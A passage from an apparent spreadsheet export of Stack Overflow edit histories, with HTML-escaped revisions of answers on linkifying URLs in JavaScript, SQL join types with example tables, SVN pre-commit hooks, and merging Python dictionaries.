 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;/ig;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For example:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-title"&gt;replaceURLWithHTMLLinks&lt;/span&gt;(&lt;span class="hljs-params"&gt;text&lt;/span&gt;) &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; exp = &lt;span class="hljs-regexp"&gt;/(\b(https?|ftp|file):\/\/[-A-Z0-9+&amp;amp;@#\/%?=~_|!:,.;]*[-A-Z0-9+&amp;amp;@#\/%=~_|])/ig&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; text.replace(exp,&lt;span class="hljs-string"&gt;"&amp;lt;a href='$1'&amp;gt;$1&amp;lt;/a&amp;gt;"&lt;/span&gt;); _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; I've only fixed the problem in the question where the regular expression was only replacing the first match. The regular expression above probably misses a lot of edge cases. See the Jeff Atwood's blog post &lt;em&gt;&lt;a href="http://www.codinghorror.com/blog/2008/10/the-problem-with-urls.html" rel="nofollow noreferrer"&gt;The Problem With URLs&lt;/a&gt;&lt;/em&gt; for a better method of finding URLs in text.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dan Dascalescu</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;What is the difference between &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;INNER JOIN&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; and &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;OUTER JOIN&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;, and&lt;/span&gt; how do &lt;code&gt;LEFT JOIN&lt;/code&gt;, &lt;code&gt;RIGHT JOIN&lt;/code&gt; and &lt;code&gt;FULL JOIN&lt;/code&gt; fit in?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Also&lt;/span&gt; how do &lt;code&gt;LEFT JOIN&lt;/code&gt;, &lt;code&gt;RIGHT JOIN&lt;/code&gt; and &lt;code&gt;FULL JOIN&lt;/code&gt; fit in?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Martin Smith</t>
  </si>
  <si>
    <t>Mus</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Assuming you're joining on columns with no duplicates, which is by far the most common case:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt; An inner join of A and B gives the result of A intersect B, i.e. the inner part of a venn diagram intersection.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; An outer join of A and B gives the results of A union B, i.e. the outer parts of a venn diagram union.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h1&gt;&lt;span class="diff-delete"&gt;Examples&lt;/span&gt;&lt;/h1&gt; _x000D_
 &lt;p&gt; Suppose you have two Tables, with a single column each, and data as follows:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;A    B_x000D_
&lt;span class="hljs-operator"&gt;-&lt;/span&gt;    &lt;span class="hljs-operator"&gt;-&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;1&lt;/span&gt;    &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;2&lt;/span&gt;    &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt;    &lt;span class="hljs-number"&gt;5&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt;    &lt;span class="hljs-number"&gt;6&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note that (1,2) are unique to A, (3,4) are common, and (5,6) are unique to B.&lt;/p&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-delete"&gt;Inner Join&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;p&gt; An inner join using either of the equivalent queries gives the intersection of the two tables, i.e. the two rows they have in common&lt;span class="diff-delete"&gt;. A unqualified join (i&lt;/span&gt;.&lt;span class="diff-delete"&gt;e. &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;a join b&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;) uses an inner join in database engines that support the syntax.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a &lt;span class="hljs-keyword"&gt;INNER&lt;/span&gt;&lt;span class="diff-delete"&gt; &lt;span class="hljs-keyword"&gt;JOIN&lt;/span&gt; b &lt;span class="hljs-keyword"&gt;on&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a&lt;/span&gt; &lt;span class="hljs-keyword"&gt;JOIN&lt;/span&gt; b &lt;span class="hljs-keyword"&gt;on&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; a.&lt;span class="hljs-operator"&gt;*&lt;/span&gt;,b.&lt;span class="hljs-operator"&gt;*&lt;/span&gt;  &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a,b &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
_x000D_
a &lt;span class="hljs-operator"&gt;|&lt;/span&gt; b_x000D_
&lt;span class="hljs-comment"&gt;--+--&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-delete"&gt;Left Outer Join&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;p&gt; A left outer join will give all rows in A, plus any common rows in B.&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a &lt;span class="hljs-keyword"&gt;LEFT&lt;/span&gt; &lt;span class="hljs-keyword"&gt;OUTER&lt;/span&gt; &lt;span class="hljs-keyword"&gt;JOIN&lt;/span&gt; b &lt;span class="hljs-keyword"&gt;on&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; a.&lt;span class="hljs-operator"&gt;*&lt;/span&gt;,b.&lt;span class="hljs-operator"&gt;*&lt;/span&gt;  &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a,b &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b(&lt;span class="hljs-operator"&gt;+&lt;/span&gt;);_x000D_
_x000D_
a &lt;span class="hljs-operator"&gt;|&lt;/span&gt;  b  _x000D_
&lt;span class="hljs-comment"&gt;--+-----&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;2&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-delete"&gt;Right Outer Join&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; A right outer join will give all rows in B, plus any common rows in A.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a &lt;span class="hljs-keyword"&gt;RIGHT&lt;/span&gt; &lt;span class="hljs-keyword"&gt;OUTER&lt;/span&gt; &lt;span class="hljs-keyword"&gt;JOIN&lt;/span&gt; b &lt;span class="hljs-keyword"&gt;on&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
_x000D_
 a   &lt;span class="hljs-operator"&gt;|&lt;/span&gt; b  _x000D_
&lt;span class="hljs-comment"&gt;-----+----&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;null&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;6&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;null&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;5&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-delete"&gt;Full Outer Join&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; A full outer join will give you the union of A and B, i.e. All the rows in A and all the rows in B. If something in A doesn't have a corresponding datum in B, then the B portion is null, and vice versa.&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a &lt;span class="hljs-keyword"&gt;FULL&lt;/span&gt; &lt;span class="hljs-keyword"&gt;OUTER&lt;/span&gt; &lt;span class="hljs-keyword"&gt;JOIN&lt;/span&gt; b &lt;span class="hljs-keyword"&gt;on&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
_x000D_
 a   &lt;span class="hljs-operator"&gt;|&lt;/span&gt;  b  _x000D_
&lt;span class="hljs-comment"&gt;-----+-----&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;2&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;null&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;6&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;null&lt;/span&gt;&lt;span class="diff-delete"&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;5&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-delete"&gt;Cross Join&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; A cross join will join all rows in both tables. This is what you get if you leave out a join condition in your query. &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;This is almost always an error.&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; This will produce a &lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Cartesian_product" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Cartesian product&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; of the two tables, meaning if table a has &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;n&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; rows, and table b has &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;m&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; rows, the result set will contain &lt;/span&gt;&lt;i&gt;&lt;span class="diff-delete"&gt;n&lt;/span&gt;&lt;/i&gt;&lt;span class="diff-delete"&gt;Ã—&lt;/span&gt;&lt;i&gt;&lt;span class="diff-delete"&gt;m&lt;/span&gt;&lt;/i&gt;&lt;span class="diff-delete"&gt; rows.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a &lt;span class="hljs-keyword"&gt;CROSS&lt;/span&gt; &lt;span class="hljs-keyword"&gt;JOIN&lt;/span&gt; b;_x000D_
&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a,b;_x000D_
_x000D_
a &lt;span class="hljs-operator"&gt;|&lt;/span&gt; b_x000D_
&lt;span class="hljs-comment"&gt;--+--&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;/span&gt;&lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="diff-delete"&gt;&lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;2&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;&lt;span class="hljs-operator"&gt;|&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;&lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;2&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;&lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;5&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;2&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;5&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;5&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;/span&gt;&lt;span class="hljs-number"&gt;5&lt;/span&gt;&lt;span class="diff-delete"&gt;_x000D_
&lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;6&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;2&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;6&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;6&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;6&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Assuming you're joining on columns with no duplicates, which is by far the most common case:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt; An inner join of A and B gives the result of A intersect B, i.e. the inner part of a venn diagram intersection.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; An outer join of A and B gives the results of A union B, i.e. the outer parts of a venn diagram union.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Examples&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Suppose you have two Tables, with a single column each, and data as follows:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;A    B_x000D_
&lt;span class="hljs-operator"&gt;-&lt;/span&gt;    &lt;span class="hljs-operator"&gt;-&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;1&lt;/span&gt;    &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;2&lt;/span&gt;    &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt;    &lt;span class="hljs-number"&gt;5&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt;    &lt;span class="hljs-number"&gt;6&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note that (1,2) are unique to A, (3,4) are common, and (5,6) are unique to B.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;inner join&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; An inner join using either of the equivalent queries gives the intersection of the two tables, i.e. the two rows they have in common.&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a &lt;span class="hljs-keyword"&gt;INNER&lt;/span&gt; &lt;span class="hljs-keyword"&gt;JOIN&lt;/span&gt; b &lt;span class="hljs-keyword"&gt;on&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; a.&lt;span class="hljs-operator"&gt;*&lt;/span&gt;,b.&lt;span class="hljs-operator"&gt;*&lt;/span&gt;  &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a,b &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
_x000D_
a &lt;span class="hljs-operator"&gt;|&lt;/span&gt; b_x000D_
&lt;span class="hljs-comment"&gt;--+--&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;left outer join&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A left outer join will give all rows in A, plus any common rows in B.&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a &lt;span class="hljs-keyword"&gt;LEFT&lt;/span&gt; &lt;span class="hljs-keyword"&gt;OUTER&lt;/span&gt; &lt;span class="hljs-keyword"&gt;JOIN&lt;/span&gt; b &lt;span class="hljs-keyword"&gt;on&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; a.&lt;span class="hljs-operator"&gt;*&lt;/span&gt;,b.&lt;span class="hljs-operator"&gt;*&lt;/span&gt;  &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a,b &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b(&lt;span class="hljs-operator"&gt;+&lt;/span&gt;);_x000D_
_x000D_
a &lt;span class="hljs-operator"&gt;|&lt;/span&gt;  b  _x000D_
&lt;span class="hljs-comment"&gt;--+-----&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;2&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;full outer join&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A full outer join will give you the union of A and B, i.e. All the rows in A and all the rows in B. If something in A doesn't have a corresponding datum in B, then the B portion is null, and vice versa.&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-operator"&gt;*&lt;/span&gt; &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; a &lt;span class="hljs-keyword"&gt;FULL&lt;/span&gt; &lt;span class="hljs-keyword"&gt;OUTER&lt;/span&gt; &lt;span class="hljs-keyword"&gt;JOIN&lt;/span&gt; b &lt;span class="hljs-keyword"&gt;on&lt;/span&gt; a.a &lt;span class="hljs-operator"&gt;=&lt;/span&gt; b.b;_x000D_
_x000D_
 a   &lt;span class="hljs-operator"&gt;|&lt;/span&gt;  b  _x000D_
&lt;span class="hljs-comment"&gt;-----+-----&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;2&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt; &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;3&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;4&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;4&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;null&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;6&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;null&lt;/span&gt; &lt;span class="hljs-operator"&gt;|&lt;/span&gt;    &lt;span class="hljs-number"&gt;5&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Kip</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You mean change the text file before it's committed? You can (I'm not sure how), but it's generally not a good idea, as it doesn't tell the client about the change, so the local copies become void on a commit.&lt;/p&gt; _x000D_
 &lt;p&gt; What I would do is block the commit (&lt;code&gt;&lt;span class="diff-delete"&gt;non zero exit&lt;/span&gt;&lt;/code&gt;), and give an &lt;code&gt;&lt;span class="diff-delete"&gt;error message&lt;/span&gt;&lt;/code&gt; as to why you don't want that revision to go through.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You mean change the text file before it's committed? You can (I'm not sure how), but it's generally not a good idea, as it doesn't tell the client about the change, so the local copies become void on a commit.&lt;/p&gt; _x000D_
 &lt;p&gt; What I would do is block the commit (&lt;span class="diff-add"&gt;non zero exit&lt;/span&gt;), and give an &lt;span class="diff-add"&gt;error message&lt;/span&gt; as to why you don't want that revision to go through.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Grant</t>
  </si>
  <si>
    <t>Alireza</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In your case, what you can do is:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;z = &lt;span class="hljs-built_in"&gt;dict&lt;/span&gt;(x.items() + y.items())_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This will, as you want it, put the final dict in &lt;code&gt;z&lt;/code&gt;, and make the value for key &lt;code&gt;b&lt;/code&gt; be properly overridden by the second (&lt;code&gt;y&lt;/code&gt;) dict's value:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;x = {&lt;span class="hljs-string"&gt;'a'&lt;/span&gt;:&lt;span class="hljs-number"&gt;1&lt;/span&gt;, &lt;span class="hljs-string"&gt;'b'&lt;/span&gt;: &lt;span class="hljs-number"&gt;2&lt;/span&gt;}_x000D_
